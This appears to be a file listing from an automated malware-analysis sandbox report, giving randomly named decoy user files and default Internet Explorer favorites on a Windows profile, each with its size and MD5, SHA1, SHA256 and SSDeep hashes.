C:\Users\5p5NrGJn0jS HALPmcxz\Videos\igFrRTPuZ1KOcff.avi	35.66 KB	MD5: 51e5ba26ab80273327e2bde7150b0260 SHA1: 9877755a8c8769aac8698c1929b2d2e583e028f4 SHA256: 7e5d17f9ffb3736854ef6ec101222c2fe50c9342dcd345dc536cb402aba4c49b SSDeep: 768:CfuhICsqxgcRu4zhLq565ZsKTvXpc0631KKHQ8mvSm6TvmIch2kk2B1JWDU:AKIYxX9LB5pDc3wEQ1PAuIuZk61A4	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\M2Hq1q.mp4	91.25 KB	MD5: 688c042292039d214e6d56ee7ee0393e SHA1: 3ab797352840d03ce0b688041298adcf55a181a8 SHA256: 3077995b3090b4351ab1901c69560947e6f53bf4e506e276fbc9e0f425c6cbcb SSDeep: 1536:G2PJeD8XSncd8XU3tMp9J1lsfxc/ETB9V1QI/6RkfDula2qf2XQyAhzDOOhmMTWx:GEJw8gcd8kQ9J1uZci9HnDaqfr0AmYc	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\thMFQm.flv	39.65 KB	MD5: d78c58f432fa0f6c478dd524535ab0a8 SHA1: 5f8c26acc9e2d8734807c030e2578cc66e76659c SHA256: 2211c14bba5547ab3f2df73fbb91f87d58a528228f285daa1f01507a6f318eed SSDeep: 768:UyNKnrc2bn+CelMb6tVKTgCHEhPE4y452RvbE7IXj+MwH8csZS8Qy:UwKnA2bn+metVceX14bE7EKZHBq7	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\VvaG-iQ-9rXlD9Y.mkv	19.85 KB	MD5: 08220caeee65ba36de472c5c46f35537 SHA1: dbe55fb40de0ddbcc03074bca2d1feca8cb05d36 SHA256: 8d35680304dfafa666e2bd6944ca3f4da6c54cea69f93bc23429dcbfe7db2f0c SSDeep: 384:bpCDbJrIMEtSy21mmF++O9GC+d1fNlXEUZxI+5dXXTdLdj77DWThf:92bJrX+SlgQOed1lNBx5FXTdVb+hf	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\eyzvk3aytLrTvd\LL-t.wav	60.85 KB	MD5: b32e1145a1a5464d8e1e1a360684890c SHA1: e2a5536f473dc1ab010ac75c51504018457b0ed2 SHA256: e29788673d1a4ac25ca02e9873bf17050df85334416c9bd771004cffad91cba4 SSDeep: 1536:HJb7Xy0cbuX/428ZCX84ZyafQqsPYfBWlJvW4IIfboLnYTmKXhOg:pb+VtEX3ZXfQHOnIyYT2g	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\eyzvk3aytLrTvd\rb8St5qJhaFz.bmp	93.95 KB	MD5: 2a4024751246d9bfb95484a074b34d84 SHA1: 6bacec934857d60d49f6f736c892a0edf520b21f SHA256: a085899cb95ad63c314c3787c5575154b8414addd7fe5483e0eca4c23a4737d9 SSDeep: 1536:K8pe8L46CfCERgaNoMySDqEDa4YEhEDcmL9aNgY4Kuv9jCDZpB:lP46q9gaNoMXWGJO95QgNsX	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\iN9wXlo7M3\HID JrRHaaXMym.swf	72.34 KB	MD5: 40dfdab3b1f3f0ca096054c199b1b591 SHA1: c71fda692d30b60aa57897baf53cbc9654dbdcf9 SHA256: 214ffb4801bab8ca8d220e8707a245f85612c8ab4bfcb581ad4bb88478513e97 SSDeep: 1536:fzGwxJsWQmNe/FprXjxkWojKFlMFjchhfHa08i5CetNnQEMA9:LGw0/FZjzo2nMF43fX157BQJk	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\iN9wXlo7M3\XWPPBA.flv	28.88 KB	MD5: f189e021c0667d625b20681825ea9131 SHA1: a525c3273e248f3d01f6971a4533eb20d5b87746 SHA256: d9742047e9a7543fc9d7ad6e4d1d28e1eb16f595531ec3b62e03de391fe491ae SSDeep: 768:C+/gBHg0wjHwSDB713luB3uqv80q8Bv2tH0BMlERb54/pJ2:Cg0A17h11g3PdBsHwMSRbWpQ	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\FRhJVbO27hszhEC4EU.odp	74.32 KB	MD5: a7e0be614a15153ae42011cc132c38f9 SHA1: 7e96a02ce76aa8dc389da0907ade5ff4266b5ae5 SHA256: d41514d1a698da480e48914b4f0defc68747197882e3ad69d20c4c8814143409 SSDeep: 1536:2XEdHWvQhoNlVbLJ11fWM16BGRIcjqDBlJeXBywTd5n/JqeYvs:2e6QuNlVbDlMo5jkxeX4wTjnz1	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\pCC1nCcN4mL.xls	79.74 KB	MD5: 71a695aa9cd25c868b97941a767c1b45 SHA1: fade713b2214bc5ec5dc79017acd61080ce66f81 SHA256: 070185c3d0760143482437812bb44df178c30638e7f119979f76275ff6c0ed0f SSDeep: 1536:p781l6PKHFqc4ZmJYKJvS8IyNdUS8VTX1RQG+xzeuGclxUY37tG7fUi6TKg7:mzYmJ1cENrMNduNx17tG7MBOg7	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\SNg4GRtr2YJUAzJ_6.ppt	88.27 KB	MD5: b87609ceed6f7b26e1a27a62e5144339 SHA1: 12d62b8b997d5f9e3346a82b38f3bcdb257c43f8 SHA256: 267191aaa7d915876e9b68f450a584c46b9e078deb0c246f7a4df58fd6b44e25 SSDeep: 1536:12qH+WQ2cc459AmkTQ4lB+UasRo6WfdYf8RctERYLwSADhOtkOlUjprFDQO:1x+dP5STNl4UaktGuf8Ez0DhWlUlrF5	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Outlook Files\voeimd@djhreuu.uhd.pst	265.08 KB	MD5: df5f8b90ec27d73ebf9a2ad1894c8648 SHA1: 904989b6038da2e3ce8a40c4ebe860b48e02d889 SHA256: c8469a513487e91610a5fe839790aa0717154619ba62222017af2247df5bfd6c SSDeep: 3072:PuucXscJmlsUOT7Ls0Z0gCmVfIc8eq0tikm1MDZNsqFG6Aq847O6:PVcXscJmlU0/mVAcJjteczbNrVK6	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Links\Suggested Sites.url	314 bytes	MD5: b3a605fb7d5b3207df25242ba4550dc6 SHA1: 6d55671d2ef802aeb492f7d79e9c17b3f65ab5c2 SHA256: 7daf31bfaf5683d4f4e25d92d64bdb1beca9a968c661125e7c628fbc5f080431 SSDeep: 6:J5E5NepJLSHD/SQx7HiB272wLqx85x/8Xhjw3ucwo45mKLWoIcii96Z:/JuHW7ZMqx85xUXhuucDeJ9Icii9a	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Links\Web Slice Gallery.url	304 bytes	MD5: a0d2b72ea18c5506541fe3b5bb4fead1 SHA1: 478d5d06fcffb9f875e942e6facce137c6f50868 SHA256: 5730c760442141f7b600ad6daf2133cd317aaec6a2c6084a70dddfeb793a9424 SSDeep: 6:J5E5NepJLSle3M5c72wphloQy8hM0LbREqc7ovUHVo45mKLWoIcii96Z:/Jule34c72wF3y8q0PqoVeJ9Icii9a	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\IE site on Microsoft.com.url	211 bytes	MD5: 77de8ebd227adda7e22e2401d4eaff36 SHA1: 3b3df55160cb9e3f9b04285fb0e10c775d8401e5 SHA256: 1a30b045d82b961004c60adf7f3b2e71db674f3afdc129fbcb669f96ce0eb04a SSDeep: 6:J5E5NepJLSle3M5c72wph63bk6Vo45mKLWoIcii96Z:/Jule34c72wAbkXeJ9Icii9a	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft At Home.url	211 bytes	MD5: 72761f9eb10188afb10b22139d3aae07 SHA1: 3415617bbf001b5324ea8f486db99db082fa04b7 SHA256: 534c383248860fe80bfc47b8c6df3132ef87637618553ab8bf57dd68f8c4f05d SSDeep: 6:J5E5NepJLSle3M5c72wph61hgk6Vo45mKLWoIcii96Z:/Jule34c72wjkXeJ9Icii9a	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft At Work.url	211 bytes	MD5: 6eaa86e62edb98a8e1ebf84047768016 SHA1: b00436c51375b36179cad25edee9ac45fcb3cb71 SHA256: 8c39c7e8fa739a1e6e32dce7422d5013fcf5e732fb3fb23dd4643ed32fe9b142 SSDeep: 6:J5E5NepJLSle3M5c72wph63k6Vo45mKLWoIcii96Z:/Jule34c72wIkXeJ9Icii9a	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Autos.url	211 bytes	MD5: f08869ef003c41d33bfd319c464f07e0 SHA1: 5412e4c1cf9eca81d363864ba06b952c5b8fd0b6 SHA256: 2b1021e267a12bc3ef79445e5290ffe915b6a7478ee19b8b779e3f73ec797d07 SSDeep: 6:J5E5NepJLSle3M5c72wphlock6Vo45mKLWoIcii96Z:/Jule34c72wFZkXeJ9Icii9a	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Entertainment.url	211 bytes	MD5: 6b968563369cb24ae186814fff0d83d4 SHA1: 87db2558d4f4d53ede0ccfb466e881f3a3eea3fc SHA256: 54a04e8f3e2c56671137c93cd1362949443f1f4194198ba43d7907bc69829900 SSDeep: 6:J5E5NepJLSle3M5c72wphlo7k6Vo45mKLWoIcii96Z:/Jule34c72wF+kXeJ9Icii9a	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Money.url	211 bytes	MD5: 85413a59e29c27a31bed0071d948255f SHA1: e126309f01188071882a6f9f063f1791aa0fab1c SHA256: bb210d6117ef469224a558064faf0543228ef19b253278f5cfb9cd589f89834d SSDeep: 6:J5E5NepJLSle3M5c72wphlombk6Vo45mKLWoIcii96Z:/Jule34c72wFHkXeJ9Icii9a	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN.url	211 bytes	MD5: 474a7efe32e22c1e876af461d0bec025 SHA1: 7db07aeccb4732967ea2ff85c402103fba669334 SHA256: 4fe1bcecee325b8c71ba7f909f470468332252e4621a2f4363efe3ceea3e3172 SSDeep: 6:J5E5NepJLSle3M5c72wphloXbk6Vo45mKLWoIcii96Z:/Jule34c72wFybkXeJ9Icii9a	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSNBC News.url	211 bytes	MD5: 47f798f8f859f44d3ace3a142a5c0b11 SHA1: 5e4c9cf9b1a3f8307493b6ca06b5a5e35f18613b SHA256: e53038509cbc98830e1030c03b1afc949d0aada3ced827f012ab5421d17891b8 SSDeep: 6:J5E5NepJLSle3M5c72wphloNk6Vo45mKLWoIcii96Z:/Jule34c72wF8kXeJ9Icii9a	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Gallery.url	211 bytes	MD5: ae50cec0ac41a78053c0e2207e3bc113 SHA1: 290197beb62914c44e3d543be4f35b43f38f3792 SHA256: ff5654346a3d82c68348549cbf1a826adc0f18ddbb81bb359df2987cb322fc35 SSDeep: 6:J5E5NepJLSle3M5c72wphloi1k6Vo45mKLWoIcii96Z:/Jule34c72wFp1kXeJ9Icii9a	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Mail.url	211 bytes	MD5: 453b3787c4189adacda7ddaf599efca4 SHA1: 4ef308539ec9066964468640493fa130d5691b50 SHA256: e23f88995dd36a60ae69f5c51db2d6fc3d35f8397904f40d6af941689c8311a6 SSDeep: 6:J5E5NepJLSle3M5c72wphloEbk6Vo45mKLWoIcii96Z:/Jule34c72wFdbkXeJ9Icii9a	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Spaces.url	211 bytes	MD5: c6c0977936a0f70305c88dac8d8af4a1 SHA1: ae6e10efbe79c058071cfb7e423b5fe32257f3ca SHA256: aefb7d0ebb8308f955a8f9b046221c05a36fbc5481ab8bce7ee59ed1ee11f3f7 SSDeep: 6:J5E5NepJLSle3M5c72wphloOk6Vo45mKLWoIcii96Z:/Jule34c72wFrkXeJ9Icii9a	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Music\tvalSG6kWCd\LJP4K.m4a	6.07 KB	MD5: a9307e5a9f153a09f360bd69a7d9976a SHA1: bf1fcbd2bdcc248fecfc29013c579ed8a10a3b12 SHA256: 2df314876dcad02ed762bf5d89acaf817d2adf59f689cc762a915eb97789f834 SSDeep: 192:7R8ij+QjPBuLqO3p6PXtQNqfHfZFbYbd3mJ7sL/:76ybB9zdQUBFbYbEM/	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\-Bnbr4EKB.m4a	8.24 KB	MD5: 80dccf4e0917d65e92b0765313728963 SHA1: f7754a268e895f13992bbdf2ac135ece53f54c27 SHA256: e6e31e64cfac2d36df7468e4c095597d35e284c5c8eb974177a562c5373d0d59 SSDeep: 192:duIhz/P3xKGqzglvy5FNPA+LdS3eZtSx+4LJq54+hXU:13/qzFDLdS3lq5/XU	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\DD0VSBvifKy.wav	65.35 KB	MD5: 8d7d5d5b9435a22f94472d65296d2b29 SHA1: 482356b2cacb2d5395cea8f07d0724d5abce4009 SHA256: 6b5cf7b416b542d9640dc3a4695d4de568de47c82390c41514550448fad21cee SSDeep: 1536:eji6kGtB+dyM53/KMVtsclJ56ypAaTjdBFgxkOAlKW8tgs0HB8:6pjMZ/ycr56yBvFikOSCTo8	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\mt-NxS9.m4a	86.23 KB	MD5: 6db15b4d7d3c711c3fcd08681a67454d SHA1: 3b509e45189035092f740bd65448bf9ccab51405 SHA256: 71dc07b8891aa0afb0262f3f7653271eeb9b467fe0d11876ea6d3ff33678c053 SSDeep: 1536:cwAeMZ6NhdnLy9RWS7LRKsUAy+BFx7qxNjIvs6eWQRkkyffUGl/DrnFkaC3gqw6K:Xk6Nh5pwKsUCBFxefcvityFtDTFk+O9A	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\_US29v3kaQayesknOB.wav	32.16 KB	MD5: 4f0b15b8ab820dc36571fe6761c5d13e SHA1: 7fefab76dc5011f45f22256efc0c26a88d58c36a SHA256: c42c0f6da35fa9ed3ae2c8a503c1e04461f8becbc68b5dadab715a38dab9b8a4 SSDeep: 768:wC1vlZFma0vHBxcG/wGjn1pCy8B1n8tLLZgnvcx4+:w8vlZMjBx19+Bqtmnv2	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\nEqZA\9I3wBfC.png	96.77 KB	MD5: 9d79f36512d47ee0a723665b08261e47 SHA1: 44fa54856ab4daa8b349e408cc9eac1b65c49889 SHA256: 35828b56c6e3e4275a31bdaf3f2156db39da59d412ae8d89cd94582dc0fce6b7 SSDeep: 1536:LdZB5VMtOr6DmVzIEW4kYF0JkvzlCF0OsJ4V20iCcs8aeS4AXx9Ziww1zLKtAow3:xZB5VHBz53n5hy0aVICffXnww6LpP	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\nEqZA\gXqHnWD.bmp	17.88 KB	MD5: 4d0ba3f59465ab1b6612c0b402c1ecc4 SHA1: 2bfe44604dd484285d8ff7cc86681843a5220ae4 SHA256: 7c14c50c4a05d6167748ebb929ba0cd203c972bc6393423f9c93ac033ad0be60 SSDeep: 384:s2SxzYQNm1iByR8CK+SWZgGcvEqbx0810A4+OQahrHRqzWJ6woN:lSxzBKiBXzT4grEqV08l4dQqrHRqzWAp	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\nEqZA\pWM7.png	52.62 KB	MD5: 4858d9078c099be5a7fd5ef7940f1299 SHA1: 87b7d0ea83739b807b7b83b28d88ba7381b770e4 SHA256: a42db4c0c0cbd19f479e7cdbed565cc1577bf08606fa9ffbb638545f2d771b90 SSDeep: 1536:IkQAhE3uQd8QbVlylL3vlVMXiI7cDkkMa2kvx7ZfW:IFAhEeErq5/lV+imxoXZQ	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\OSKgyoas7znhFe\3J2ydx.jpg	59.23 KB	MD5: 98f6e19542071d4242ebc25ebab04900 SHA1: b044307bad02ed104ba43e6b3c35479daa097b0a SHA256: a990d9c047101d63606c77f9fa30db6be55da881aaf94fd76da733fa95f8b246 SSDeep: 1536:yqt4PmupBdTKdugie3ieTf8VtGo28izVm8tSh+rmHGpS:y9ppLTw73notizVm8Sh+rW	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\OSKgyoas7znhFe\dbSz.png	24.78 KB	MD5: 5ad656247e508ac2da49e725856478e4 SHA1: 776c035467551eface671291bcfe588cbce97df2 SHA256: dad2a0e0b0d10c21fef3c870f359d3822e255bbf88f3f97c1ffd874a99f956ea SSDeep: 384:l8gNc/H7hca1rm1NIpINGY1PdVbQPrBnO51hhK/6L1JRN/MkHG55cyLiyKHQ+C2S:O6mH7hyIPWbOBKbK/65p4tL5K0	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\OSKgyoas7znhFe\XHt9VP7ib.gif	28.59 KB	MD5: 1eed4b5bcdbb871c961d0656f37a3b1d SHA1: b717ed3b88dc35660c0b2d328d4fb88df41f21f1 SHA256: 5bdcc999533033cf5aeb9e6f6e1819a15a04438d82eb76d9b58eb49d36673552 SSDeep: 768:gBmITpe/hE8Z7C6B+OnRU1U52idLhxwJd6fs0:gRFe/797RAc2idtxwfP0	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\OSKgyoas7znhFe\_iolZcQAgtC1ACM.png	55.14 KB	MD5: a78829af6be1757a61922e7731cf1036 SHA1: 85b47a1deb53081ac740d755831d7f7c6d6f0211 SHA256: d6ee82e41f81c31b9c0929512c33f5bf9fbacbb207e0b3cd020628cdf0e877f0 SSDeep: 1536:df07PX5zApShoTG8sRAhuj06mevh2nfPP:df07PX+choTG8KHp4PP	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\r-u9vnXsx8Ur0\ampfWs0z5kbstxRZUv.png	78.64 KB	MD5: 86d77ba9f0cc90c6ccb788b635baf9f4 SHA1: 3179784d3ec9539897d35ee17351b2df3ca96f34 SHA256: 7d8257c858e4ed59f1bc2407d7692432ea02532fd7c6e26dc95a5f7dd4cc7b10 SSDeep: 1536:cIBV1s5LHGrrMMG0CmkN4Waeaf75reyOkkA5Pzw2es0fSRzFt/QNyu+nQX8xr2E:cwV1kLHGfWJN4W65ayOQh/eXqRRyNypZ	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\r-u9vnXsx8Ur0\HAJ2zHK0.png	75.86 KB	MD5: 39a95a04d02a1f69a1ece45d8841d9ba SHA1: cf625c981fce9da3038a43a10f90130dd22232f8 SHA256: c6835b57f863b94b0dad30260dc2541a5c6210385d3a3cd28d8a67b6d0db9445 SSDeep: 1536:suGjloIAKZ712JXP/pM/2xPR0o8+cRQQzs2UjMoeGg+8lel6ADJgFpz1qve7lGpP:sFAA14PK+xPKsQzWjxVUwiFpove7lGpP	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\r-u9vnXsx8Ur0\lJDyJz4X_LOUsSG.png	83.89 KB	MD5: 0f705d74f17dd4741d9bc53353aab0b8 SHA1: 89126ba0a828d3758d6b776039afb5393fa06122 SHA256: 00ab259acc8fbb8dc15191b06d6013068a0450f9160ccac8691827748517b996 SSDeep: 1536:mGa/yhILWN3rV/iXhnVT2K9PLsGmY34fcECOVeHNEi/o0HmerJzvp:mG+2ILW5rsXhnVaKBIGRWC8GrVLp	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\r-u9vnXsx8Ur0\Xu0FJPBCEsMrFdRg0wfb.png	57.96 KB	MD5: 9d65223fbab94ce7242a036ed7e661c7 SHA1: 339fd2ce4a21afc153f4a36271dced13dde50203 SHA256: 04bad37c33a9abec3f43f537c4bb89ba92c8db8b1c4153605cce8832c78ca35b SSDeep: 1536:LdQywIZy48Al3NUO7F5NKiIsnceaEpDeJMNqgAa7W:RK88grcxD5ExeJM9hW	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\r-u9vnXsx8Ur0\y0VZOX.jpg	15.32 KB	MD5: a22aca0adc30fe9a4d63dd2d7e9fb1d4 SHA1: 4c84f102c0af5fb197aa0001e723bbe8289acca4 SHA256: ded252eba068d9ab83df3a47fc958ff1bd60ce61fb4374cab4ccd550a15bc75e SSDeep: 384:YXHEldwTJ/LEC7yiOkH+3zI63EmrRhgRlPpFUMIjcw0Fu:YXEuJShD3zIFmrAjPM/Inu	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\cpBN4K954GbZNf.mp4	22.28 KB	MD5: 0e4039f9411e85f9c47941e5bcb41d77 SHA1: bb9f153a70dcb8aa40a905ce48acd0b5a5020cbb SHA256: 4172235188c214ab31587c7133f788d09cc133a3e047e3124f64dafbb7d42a71 SSDeep: 384:P4AGtsALTBZSn7MVZY3xhqZSLrJkT1B7VkaxNdeFAq9SlasenH6vq:PdzA3C7M03ziSLNkT1TPxNdeFKaxH6vq	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\GpZ VRAn1yi_-.swf	26.00 KB	MD5: 6a2fd9bef5a9b01f77bd1c03586b350f SHA1: 0a166373bf55c2b4296be9ff62fa9bc2a83e6f0b SHA256: e3cf87e61b9d70490d87bc38090364245f624a8a6cec1e47ef2710dd9166fb49 SSDeep: 768:j6YXJrGFRxgfeL1ImTSw7n/R244fXEj/2:j6YXJrGFmeLankJ2PPKO	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\jXsioQ.swf	6.98 KB	MD5: d58178812bce14e3214732a5948b64af SHA1: 73b5c088c1b43c43dfd1083bd35f6f2fb09db7e6 SHA256: 58f17c0ab209e993f13b843d146efbdef8f65367dac018e9a2a07da4ff7f3ea8 SSDeep: 96:OO/mA71zkKowNbg512L41Nr0aJPB5gXZjwl89d7/ngIGpdbKF8Dcq7jzOouq:EA7146Nk5O41Ndjqql0d7PQpTcq7jii	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\mR73VRvHqMlHdz.mp4	57.34 KB	MD5: 892f0e15c4ba9186137f7fcde324c0e3 SHA1: 95f83ab7310603524577022cb4f65295cccf2494 SHA256: 96e34ac8f4ed21b85362b934d74d36f01b04cc154b820aa17320e9af4e00ea6d SSDeep: 1536:A2sNDbUcUzyZxgiGWJZWyvfe8WA0WPdZOmO0XdZj1t:A2s9bXZxD1he8K6OmrX/pt	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\s-v3cZbpeiJD1yTvhr.swf	8.06 KB	MD5: d167b117ee35a9e5767566a213254de9 SHA1: 158a1daadb7750803cb6a65d68344b4fbe28ee67 SHA256: 4679841337133a56140430e9e154663481056201760be93868f7d4b2380c8fb8 SSDeep: 192:C2RtUtZvLO690Wud1cU29xU191FCpz2vUY+346A+e:HwFO69s29qDL19nqe	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\UAJvNRac055.avi	63.14 KB	MD5: b43daa0a5adb1b2113e361589d7f10d0 SHA1: a73f58063f2f69a23a8f56118db199582d9a7df2 SHA256: c25d0ccf8115d7318968b5d322eacceea231905c5fb08bbcf26ed4eae3d63487 SSDeep: 1536:kbk3G6SrS2Ewf55yLOb5tXxHTWfZJbm+hthmiEVX3AL8N75Qgzaz4zi:kbk3zoS2/fn4OXsxJ6whmJtAInLza8zi	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\x6E1GbuOZBC_86.swf	20.71 KB	MD5: 2ea2bd11f7f42c2f6ad6f8ad0c8b85aa SHA1: 28fe8fe6de8831aa8fa7c4352eb6df197d0d61c0 SHA256: d0512cbfcd877a0b785820967189cfb95f109ea685d4ad03808faa6d8d88c600 SSDeep: 384:pAa6710xSoniYAiNe67hU/nYTPGynbj9eVNCpguwMDiDe0vcKXVEpHT:pnAKSei+DhU/nYiyQVFuYewcm0z	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\Zmx9tyz7RoVpEsv00H.flv	66.60 KB	MD5: 8faa59a34dd053ea0dd18e6b4c10a4f6 SHA1: 54df94a778e261d60f549ca93495a4f55654e4ec SHA256: 3b9fe3c146c340254b3b79565b734f6e697f36264f1fe610e148508a91f51e62 SSDeep: 1536:9IurUf5i2h5s/f6pg4RkEmyM+uYqb7IdH:9Ivfd5s/Ci49hMTu	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\eyzvk3aytLrTvd\TB1FXyT70\6ften7Ta9q8fR_DlLE.mp4	27.17 KB	MD5: a2ac091111cef58e180584fc6e64223b SHA1: f62c0004b5f50ef42799f7580a0eb7c41470243d SHA256: dd009d052d4f4a3e3b34651693f9a6ef8fc122a0609217ded123d276efa20f46 SSDeep: 384:hqFoT5AgYXGKfWxEMz8Lpf+DheGvBwWtQ5uqnPc3sRLVzjHwqKDIN9jDfd:hqmT53YXGuNY8LV+ohD4qnCiVzbwz+fd	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\eyzvk3aytLrTvd\TB1FXyT70\PkQ0fGsu5.csv	30.15 KB	MD5: a86308f6edbec4bb09891a5ff7b454f4 SHA1: 2a4902ac4a9e32331143673591c42b0395413634 SHA256: 0c7a1971f4acfed01389ccdf98e5a6bee31ebd83c71ea2313c0cf2f72bf9995d SSDeep: 768:0JwjjZklN8tb0EjyZRJsSIY22Qslo44P5AXk7mejEN:2e9fblyHIY2u0PG0RjEN	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\JfBL0k2cocNOiKXL4y9\-pPGVSgI.ppt	79.24 KB	MD5: 53442a2ea9989900c9af577e423865ba SHA1: adc872ad6ada18ed98df59437123a7dbf2e62279 SHA256: a8cb2827d442415eae67131a25a7ee6e04f9fc1228e4b336ec00f7b3f6358246 SSDeep: 1536:L8RlpkDpfToGoYH6wBKPMaerjzlgcB/ejngMAcPr0Lx9u5q0dCL/ejt+rFd7fGSG:L2lpkDBsGo4nBKPMjTLwsoOx8zdCTfRi	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\JfBL0k2cocNOiKXL4y9\f7Iu.ppt	21.54 KB	MD5: ef5f28871cfd0b007b2ecd0e386655f7 SHA1: e7cb8c2f695b460b255bb789be87e4701a047de4 SHA256: 5ba26d494b5b490fbcff856c13812de053169782fb4d979652bd0db278b0b44e SSDeep: 384:WSRSx3Xw1vxonWXQ2xLrjn6PvlLJV0NHwL/ouLsmu9IFc/1x72YF20dbcSWh2sh9:WOSXGonWXQ0Lr7elFowromm/W+RKBh9	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\JfBL0k2cocNOiKXL4y9\_-u6ogOGtJDh_andzkIr.odt	98.74 KB	MD5: be0e57e2f3766791075ab2ba107967c8 SHA1: 7c28ace81799e9e6ca16ffb44dbaaaa6ece8a80b SHA256: d0a1fd43ad8149c58acb16f4b3c3d60b86a99b6624eeba4429ec0e8b8a05b6aa SSDeep: 1536:FzcH3yCwYoxXoW2Wxqq25dXk8MBbLIMd6i0Ch3sYlRyj9R1CEfudm1fW+Q5HlIGB:90F76By5dLMVpJd3sCcZj4AW+MI2go	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\RrMc-y7gilA\0X9H7M.ppt	46.64 KB	MD5: 70e40ac4f7e79b9bb585924e0a602e48 SHA1: 85531f176e67abbea006cf0540d4299d129b348b SHA256: a9434e3c4e0ec570d292febb57466388872cb4d02ea3fea16c8e7726462b26c1 SSDeep: 768:QK/59oqeWOJ54li5GGVY3pY1rdScJGcx3sYeZHCwSrRaYpgrqGcQCeRO:35+Wnli5GZC97LRaYqGGRCeRO	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\RrMc-y7gilA\8RDB7k.doc	21.48 KB	MD5: c6c8b474aa26e572dd6842469cb2e81c SHA1: 091a2f4fc95f1890ade27975fa812dae7988059e SHA256: 1416e3a6588459e858d6d7b5ad36df2d6b5d8720d881d2dac4c573f6b6f6ead9 SSDeep: 384:tzjZW+oSjpmjTGAVeFtGeKnYufxS9a2SMYtW9l+mL5lln8:tPsNSjDv5KnYeS9th91/l8	... File Actions Show Properties Download
